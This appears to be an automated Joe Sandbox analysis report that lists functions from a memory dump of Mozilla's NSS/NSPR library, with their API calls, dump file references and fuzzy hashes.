Part of subcall function 6C851200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C8512A1

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 330259c51aa9e8e730438cc0e7b574fcf2f4d2ed10849bc45a81163c547e7c93
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 4821D4B1D003454BE720CF559F44BAA3764AFA134CF1106B9DD085BB42F7B5E6988392

Function 6C81ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C81ACC2

Part of subcall function 6C7F2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C7F2F0A
Part of subcall function 6C7F2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C7F2F1D

Part of subcall function 6C7F2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C7F0A1B,00000000), ref: 6C7F2AF0
Part of subcall function 6C7F2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7F2B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C81AD5E

Part of subcall function 6C8357D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C7FB41E,00000000,00000000,?,00000000,?,6C7FB41E,00000000,00000000,00000001,?), ref: 6C8357E0
Part of subcall function 6C8357D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C835843

CERT_DestroyCertList.NSS3(?), ref: 6C81AD36

Part of subcall function 6C7F2F50: CERT_DestroyCertificate.NSS3(?), ref: 6C7F2F65
Part of subcall function 6C7F2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7F2F83

free.MOZGLUE(?), ref: 6C81AD4F

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 13caedd86fc04be7e05a16f2910f57cd59fb682e932c49c51450a13e16e3e1c5
Instruction ID: 43b1e33fa4ffaa9353d61662a7e406228b73c655bb6c5948e047530dbb0258a4
Opcode Fuzzy Hash: 13caedd86fc04be7e05a16f2910f57cd59fb682e932c49c51450a13e16e3e1c5
Instruction Fuzzy Hash: A72127B1D042158BEB20DF64DA494EEB7F4EF05219F554428D8187BB00FB31AA4DCBE1

Function 6C8324E0 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C8324FF
EnterCriticalSection.KERNEL32(?), ref: 6C83250F
PR_Unlock.NSS3(?), ref: 6C83253C
PR_SetError.NSS3(00000000,00000000), ref: 6C832554

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: a775300712cfb1fe83e3a10aa541c98e0084db758cc65c9dd2c7b24f0237ad83
Instruction ID: 8239de6426f1f5b0720cb731144185a37806df5548718a97d80894431c895fba
Opcode Fuzzy Hash: a775300712cfb1fe83e3a10aa541c98e0084db758cc65c9dd2c7b24f0237ad83
Instruction Fuzzy Hash: CF11E971A041189FDB10AF6CDD499BB7B78EF0A228B555524EC0997302E731EA54C7E1

Function 6C84ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C84F0AD,6C84F150,?,6C84F150,?,?,?), ref: 6C84ECBA

Part of subcall function 6C850FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7F87ED,00000800,6C7EEF74,00000000), ref: 6C851000
Part of subcall function 6C850FF0: PR_NewLock.NSS3(?,00000800,6C7EEF74,00000000), ref: 6C851016
Part of subcall function 6C850FF0: PL_InitArenaPool.NSS3(00000000,security,6C7F87ED,00000008,?,00000800,6C7EEF74,00000000), ref: 6C85102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C84ECD1

Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C8510F3
Part of subcall function 6C8510C0: EnterCriticalSection.KERNEL32(?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85110C
Part of subcall function 6C8510C0: PL_ArenaAllocate.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851141
Part of subcall function 6C8510C0: PR_Unlock.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851182
Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C84ED02

Part of subcall function 6C8510C0: PL_ArenaAllocate.NSS3(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C84ED5A

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: f2b356f3ad718e0bb38d2437078a973e8c40b4e5d096a2210072eb806ece5c2c
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: B521D4B19017465BE710CF29DA44B52F7E4BFA4309F15C629E81C87B61E7B0E594C7D0

Function 6C87EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C867FFA,?,6C869767,?,8B7874C0,0000A48E), ref: 6C87EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C867FFA,?,6C869767,?,8B7874C0,0000A48E), ref: 6C87EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C867FFA,?,6C869767,?,8B7874C0,0000A48E), ref: 6C87EE14

Part of subcall function 6C850BE0: malloc.MOZGLUE(6C848D2D,?,00000000,?), ref: 6C850BF8
Part of subcall function 6C850BE0: TlsGetValue.KERNEL32(6C848D2D,?,00000000,?), ref: 6C850C15

memcpy.VCRUNTIME140(?,?,6C869767,00000000,00000000,6C867FFA,?,6C869767,?,8B7874C0,0000A48E), ref: 6C87EE33

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: e7d908f40ec1b3be5543bb26b07ba16c480d8b29af1c134f5140b049481450df
Instruction ID: 52e8c141002b30d184f11901726d5dd11023734eea22932220254f63a6341e54
Opcode Fuzzy Hash: e7d908f40ec1b3be5543bb26b07ba16c480d8b29af1c134f5140b049481450df
Instruction Fuzzy Hash: D5117772A04706AFD7309E69DE84B8A7768EF0435DF244D35E91986A40F331E46487F2

Function 6C818DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C818DE7
EnterCriticalSection.KERNEL32 ref: 6C818DFC
PR_Unlock.NSS3 ref: 6C818E2D
PR_SetError.NSS3 ref: 6C818E49

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 0fb10add2d688117f61df2ee669a7ddae7c506af6c93329be8d71c36e758f07e
Instruction ID: 23f5b645c86334169492b30fbfc1fac4eed58808fc1684b183a4588710164247
Opcode Fuzzy Hash: 0fb10add2d688117f61df2ee669a7ddae7c506af6c93329be8d71c36e758f07e
Instruction Fuzzy Hash: C9116DB56096059FD710AF78C6481AABBF4BF05314F514D29D88997B00E730A854CBC2

Function 6C89AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C885F17,?,?,?,?,?,?,?,?,6C88AAD4), ref: 6C89AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C885F17,?,?,?,?,?,?,?,?,6C88AAD4), ref: 6C89ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C88AAD4), ref: 6C89ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C88AAD4), ref: 6C89ACDB

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 0ae16408584f482a86cbf90c7ef426bf0f654a9194e038233402e0109c416f8a
Instruction ID: eb70062b410e1ed9baec240da1d4436d213751c203d15e67d507a44af405b67f
Opcode Fuzzy Hash: 0ae16408584f482a86cbf90c7ef426bf0f654a9194e038233402e0109c416f8a
Instruction Fuzzy Hash: 1C014CB1A01B019BEB60EF29DA08793B7E8BF04699B114C39D85AD7A00E735E458CB91

Function 6C85C590 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C85C5AD

Part of subcall function 6C850FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7F87ED,00000800,6C7EEF74,00000000), ref: 6C851000
Part of subcall function 6C850FF0: PR_NewLock.NSS3(?,00000800,6C7EEF74,00000000), ref: 6C851016
Part of subcall function 6C850FF0: PL_InitArenaPool.NSS3(00000000,security,6C7F87ED,00000008,?,00000800,6C7EEF74,00000000), ref: 6C85102B

CERT_DecodeCertPackage.NSS3(?,?,6C85C610,?), ref: 6C85C5C2

Part of subcall function 6C85C0B0: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C85C0E6

CERT_NewTempCertificate.NSS3(?,00000000,00000000,00000001), ref: 6C85C5E0
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C85C5EF

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Arena_Util$ArenaCertCertificateDecodeErrorFreeInitLockPackagePoolTempcalloc
String ID:
API String ID: 1454898856-0
Opcode ID: 7452a5b961c902edba44b22c92d5dd1768ec2df6527ca8a64f014ab3fc6eb3b2
Instruction ID: bcc060e24e5f2e19799d83fcb26b8dcf591927f77554a5171c22f996d24a7278
Opcode Fuzzy Hash: 7452a5b961c902edba44b22c92d5dd1768ec2df6527ca8a64f014ab3fc6eb3b2
Instruction Fuzzy Hash: F001F7B1E001046BEB10AF68DD06EBF7B74DB04618F854079EC159B341F671A918CAE1

Function 6C8524E0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C82C154,000000FF,00000000,00000000,00000000,00000000,?,?,6C82C154,?), ref: 6C8524FA
PORT_Alloc_Util.NSS3(00000000,?,6C82C154,?), ref: 6C852509

Part of subcall function 6C850BE0: malloc.MOZGLUE(6C848D2D,?,00000000,?), ref: 6C850BF8
Part of subcall function 6C850BE0: TlsGetValue.KERNEL32(6C848D2D,?,00000000,?), ref: 6C850C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6C852525
free.MOZGLUE(00000000), ref: 6C852532

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
String ID:
API String ID: 929835568-0
Opcode ID: 8cb0a3fdcadee398e4fbda99a4fc916067eca8a44d561f255743bf102ce1fbc0
Instruction ID: 72555427ad831a0fb6c2ac3fb4a9c3bb6fa982083cdc929fc80e0c985bbf1dc8
Opcode Fuzzy Hash: 8cb0a3fdcadee398e4fbda99a4fc916067eca8a44d561f255743bf102ce1fbc0
Instruction Fuzzy Hash: 3BF096B27061213BFB60297A5D49E7739ACDB426FDB640631BD28C66C0ED94C821C1F1

Function 6C89AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6C885D40,00000000,?,?,6C876AC6,6C88639C), ref: 6C89AC2D

Part of subcall function 6C83ADC0: TlsGetValue.KERNEL32(?,6C81CDBB,?,6C81D079,00000000,00000001), ref: 6C83AE10
Part of subcall function 6C83ADC0: EnterCriticalSection.KERNEL32(?,?,6C81CDBB,?,6C81D079,00000000,00000001), ref: 6C83AE24
Part of subcall function 6C83ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C81D079,00000000,00000001), ref: 6C83AE5A
Part of subcall function 6C83ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C81CDBB,?,6C81D079,00000000,00000001), ref: 6C83AE6F
Part of subcall function 6C83ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C81CDBB,?,6C81D079,00000000,00000001), ref: 6C83AE7F
Part of subcall function 6C83ADC0: TlsGetValue.KERNEL32(?,6C81CDBB,?,6C81D079,00000000,00000001), ref: 6C83AEB1
Part of subcall function 6C83ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C81CDBB,?,6C81D079,00000000,00000001), ref: 6C83AEC9

PK11_FreeSymKey.NSS3(?,6C885D40,00000000,?,?,6C876AC6,6C88639C), ref: 6C89AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C885D40,00000000,?,?,6C876AC6,6C88639C), ref: 6C89AC59
free.MOZGLUE(8CB6FF01,6C876AC6,6C88639C,?,?,?,?,?,?,?,?,?,6C885D40,00000000,?,6C88AAD4), ref: 6C89AC62

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 18878ab2cfffd626ad2320d7dbc5a58e8a8d90a4d60d9013cfb6fc52196a9e7e
Instruction ID: 48d52b34ef0184234049a992c958534bd58caaa09858bee22086f7ff4e54afa7
Opcode Fuzzy Hash: 18878ab2cfffd626ad2320d7dbc5a58e8a8d90a4d60d9013cfb6fc52196a9e7e
Instruction Fuzzy Hash: A0018FB5A002009FDF20DF58EAC0B8677A8AF1475DF198868E9098F706D731E808CBA1

Function 6C880450 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(40C70845,?,6C884710,?,000F4240,00000000), ref: 6C88046B
GetLastError.KERNEL32(?,6C884710,?,000F4240,00000000), ref: 6C880479

Part of subcall function 6C89BF80: TlsGetValue.KERNEL32(00000000,?,6C88461B,-00000004), ref: 6C89C244

PR_Unlock.NSS3(40C70845,?,6C884710,?,000F4240,00000000), ref: 6C880492
PR_SetError.NSS3(FFFFE89D,00000000,?,6C884710,?,000F4240,00000000), ref: 6C8804A5

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Error$LastMutexReleaseUnlockValue
String ID:
API String ID: 4014558462-0
Opcode ID: e559e7cddc89bb0065b34329b3f1ea50b5bbdee894a57ab8670dfe69e1765058
Instruction ID: 2ab2ab0bc9a339be21c1b1f4b2549b1b7e34e927acb2d8e6292a3f313bfce454
Opcode Fuzzy Hash: e559e7cddc89bb0065b34329b3f1ea50b5bbdee894a57ab8670dfe69e1765058
Instruction Fuzzy Hash: DEF0B470B472455BEB20ABFD9F18B1B32A99B0120EF148C34E80AD7EA1EB21E4548551

Function 6C90CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C90CC61
free.MOZGLUE ref: 6C90CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C90CC80
free.MOZGLUE(?), ref: 6C90CC87

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 6b52dad6631d317b76fc5736037ade539b3e1f92316b65f1f65f5585e9f0b9ca
Instruction ID: 1c71aaa853816ef36f23eae0304847874b8361412def896087f541b3b8ad0990
Opcode Fuzzy Hash: 6b52dad6631d317b76fc5736037ade539b3e1f92316b65f1f65f5585e9f0b9ca
Instruction Fuzzy Hash: 46E030767046089FCB10EFA8DC4488677ACEF492743154525E691D3700D231F905CBA1

Function 6C844D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C844D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C844DE6

Strings

%d.%d, xrefs: 6C844DDE

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: ce5e621008de207ca031c0051d5fa78c6678fb5804cb86f6365471c5568676b1
Instruction ID: b1961613b6b3f0633e68686e460644b6974e7747fba4b6fa559ea71c4a7eb5c3
Opcode Fuzzy Hash: ce5e621008de207ca031c0051d5fa78c6678fb5804cb86f6365471c5568676b1
Instruction Fuzzy Hash: 1731E5B2D0421C6BEB209FA49D05BFF7768EF80309F004829ED599B681EB749905CBE1

Function 6C7E0F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C7E0936,FFFFE8AE,?,6C7716B7,00000000,?,6C7E0936,00000000,?,6C77204A), ref: 6C7E0F1B

Part of subcall function 6C7E1370: GetSystemInfo.KERNEL32(?,?,?,?,6C7E0936,?,6C7E0F20,6C7E0936,FFFFE8AE,?,6C7716B7,00000000,?,6C7E0936,00000000), ref: 6C7E138F

PR_NewLogModule.NSS3(clock,6C7E0936,FFFFE8AE,?,6C7716B7,00000000,?,6C7E0936,00000000,?,6C77204A), ref: 6C7E0F25

Part of subcall function 6C7E1110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C7E0936,00000001,00000040), ref: 6C7E1130
Part of subcall function 6C7E1110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7E0936,00000001,00000040), ref: 6C7E1142
Part of subcall function 6C7E1110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7E0936,00000001), ref: 6C7E1167

Strings

clock, xrefs: 6C7E0F20

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
